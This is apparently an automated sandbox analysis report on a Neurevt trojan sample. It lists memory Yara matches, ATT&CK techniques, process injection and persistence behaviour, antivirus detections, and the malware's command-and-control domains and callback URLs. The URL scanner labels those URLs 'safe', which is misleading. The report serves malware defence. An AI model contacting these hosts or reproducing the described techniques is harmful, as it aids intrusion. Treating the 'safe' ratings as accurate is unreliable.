                      Source: Yara matchFile source: 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.411551366.0000000001620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.349814520.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.571024772.0000000001418000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.573251429.0000000003568000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.572526351.0000000003A88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.355904622.0000000003540000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.403064355.00000000014B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.305956078.0000000000B98000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.343998812.0000000002B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000000.364565540.0000000003F98000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000000.397968179.0000000001C58000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.319722392.0000000003B60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.365991761.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000000.392323666.0000000003B08000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.312736811.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.304158494.0000000002860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.375167210.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.377927046.0000000001EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.573518624.00000000037A8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.386887819.0000000003818000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.413386214.0000000001648000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.357740409.0000000003568000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.569168238.0000000001C58000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.574122408.00000000034B8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.311100250.0000000003A88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.333990965.0000000003518000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.309309441.0000000003A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000000.361667048.0000000003F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.303926607.0000000002860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.357948198.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.337658379.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.571461105.0000000003358000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.321390577.0000000003B88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000000.371629767.00000000013F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.570822035.00000000014D8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.351556895.00000000034B8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.339819447.00000000037A8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.352061245.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.573636410.0000000001F18000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.398750308.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000000.390278122.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.346029099.0000000002B48000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000000.373766478.0000000001418000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.316211995.0000000003358000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.381234590.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: BbbEtaIxAU.exe PID: 6084, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2904, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2888, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4596, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2892, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4756, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4700, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 3208, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 3232, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2872, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4728, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2296, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4648, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4636, type: MEMORYSTR
MITRE ATT&CK matrix (techniques grouped by tactic; a leading number is the signature count badge shown before that technique):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise

Execution: 13 Native API; 1 Shared Modules; 1 Scheduled Task/Job; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript

Persistence: 1 DLL Side-Loading; 1 Image File Execution Options Injection; 1 Scheduled Task/Job; 11 Registry Run Keys / Startup Folder; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)

Privilege Escalation: 1 DLL Side-Loading; 1 Image File Execution Options Injection; 1 Access Token Manipulation; 212 Process Injection; 1 Scheduled Task/Job; 11 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)

Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 13 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 212 Process Injection; 1 Hidden Files and Directories

Credential Access: 1 OS Credential Dumping; 1 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing

Discovery: 1 System Time Discovery; 1 System Network Connections Discovery; 1 File and Directory Discovery; 112 System Information Discovery; 441 Security Software Discovery; 13 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 Remote System Discovery; Process Discovery

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content

Collection: 1 Archive Collected Data; 1 Man in the Browser; 11 Data from Local System; 1 Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 2 Non-Application Layer Protocol; 112 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols

Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station

Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups

Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact
Behavior Graph ID: 760719, Sample: BbbEtaIxAU.exe, Startdate: 05/12/2022, Architecture: WINDOWS, Score: 100

Start node
  DNS/IP: issasname.ws
  Signatures: Snort IDS alert for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 5 other signatures
  Started: BbbEtaIxAU.exe 4 21; yvneslhpc.exe 12; yvneslhpc.exe 12; yvneslhpc.exe 1 12

BbbEtaIxAU.exe
  Signatures: Creates an undocumented autostart registry key; Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Uses schtasks.exe or at.exe to add and modify task schedules; 4 other signatures
  Started: WerFault.exe 7 40; schtasks.exe 1

WerFault.exe
  DNS/IP: issasname.ws 64.70.19.203, 49690, 49692, 49693 CENTURYLINK-LEGACY-SAVVISUS United States; issasname.pw; 192.168.2.1 unknown unknown
  Signatures: Contains functionality to check if Internet connection is working; Overwrites Windows DLL code with PUSH RET codes; Modifies Internet Explorer zone settings; 6 other signatures
  Injected: zkqrKAufFycYKMdseGdhuYpyTVNu.exe 1 12; zkqrKAufFycYKMdseGdhuYpyTVNu.exe 1 12; zkqrKAufFycYKMdseGdhuYpyTVNu.exe 1 12; 14 other processes

schtasks.exe
  Started: conhost.exe

zkqrKAufFycYKMdseGdhuYpyTVNu.exe
  Signatures: Hides threads from debuggers; Hides that the sample has been downloaded from the Internet (zone.identifier)

Antivirus detection for the submitted sample:

Source         | Detection | Scanner        | Label                | Link
BbbEtaIxAU.exe | 90%       | ReversingLabs  | Win32.Trojan.Neurevt |
BbbEtaIxAU.exe | 93%       | Virustotal     |                      | Browse
BbbEtaIxAU.exe | 100%      | Avira          | TR/Crypt.ZPACK.Gen2  |
BbbEtaIxAU.exe | 100%      | Joe Sandbox ML |                      |

Dropped files: No Antivirus matches
Antivirus detection for unpacked PE files:

Source | Detection | Scanner | Label | Link | Download
4.3.WerFault.exe.4e0000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
4.3.WerFault.exe.4e0000.11.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3aac67a.3.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b6c67a.6.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
4.0.WerFault.exe.28ac67a.3.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
4.0.WerFault.exe.28ac67a.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
12.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b6c67a.2.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.353c67a.3.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
0.2.BbbEtaIxAU.exe.3420000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
13.0.yvneslhpc.exe.cd0000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen2 | | Download File
20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
4.2.WerFault.exe.28ac67a.2.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.383c67a.3.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
5.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
4.3.WerFault.exe.4e0000.16.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c7c67a.6.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c7c67a.3.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
3.0.yvneslhpc.exe.cd0000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen2 | | Download File
17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.143c67a.3.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
20.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b2c67a.2.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
10.2.yvneslhpc.exe.1510000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
4.2.WerFault.exe.2860000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34dc67a.6.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b6c67a.3.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
22.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
4.2.WerFault.exe.180000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3fbc67a.6.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
                      4.3.WerFault.exe.4e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b2c67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.383c67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      10.0.yvneslhpc.exe.cd0000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
                      8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11fc67a.7.unpack100%AviraTR/Patched.Ren.GenDownload File
                      15.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.BbbEtaIxAU.exe.cd0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.383c67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.yvneslhpc.exe.b70000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.yvneslhpc.exe.cd0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.166c67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.yvneslhpc.exe.cd0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14fc67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      4.0.WerFault.exe.2860000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.3.WerFault.exe.4e0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.BbbEtaIxAU.exe.bd3da0.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      5.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3aac67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      13.2.yvneslhpc.exe.cd0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.3.WerFault.exe.4e0000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3bac67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.2.BbbEtaIxAU.exe.ac0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3bac67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      17.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.143c67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      4.0.WerFault.exe.2860000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.yvneslhpc.exe.12b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.337c67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37cc67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      4.3.WerFault.exe.4e0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      9.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.3.WerFault.exe.4e0000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.3.WerFault.exe.4e0000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c7c67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.358c67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      8.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.3.WerFault.exe.4e0000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.337c67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3aac67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1f3c67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      4.3.WerFault.exe.4e0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1f3c67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      11.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37cc67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14fc67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34dc67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      23.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
Source | Detection | Scanner
issasname.ws | 0% | Virustotal
issasname.pw | 2% | Virustotal
Source | Detection | Scanner | Label
http://issasname.ws/xyz/abc/order.php?page=33 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php1EC24CF002C2 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=4923518 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=1465544 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=5889637F | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=8088252ZoFl | 0% | Avira URL Cloud | safe
http://%s%s/image.php?id=%sRtlQueryElevationFlagsCritical | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?page=7- | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?page=70 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=8314615Fv | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.phpion | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?page=7 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?page=72 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=9504479 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?page=38 | 0% | Avira URL Cloud | safe
http://%s%s/image.php?id=%s | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.phpO | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=4981026 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=3966837 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.phpDESKTOP- | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=8314615 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=5889637rivers | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=575573 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?page=69 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?id=5889637 | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php9p | 0% | Avira URL Cloud | safe
http://issasname.ws/xyz/abc/order.php?pid=631 | 0% | Avira URL Cloud | safe
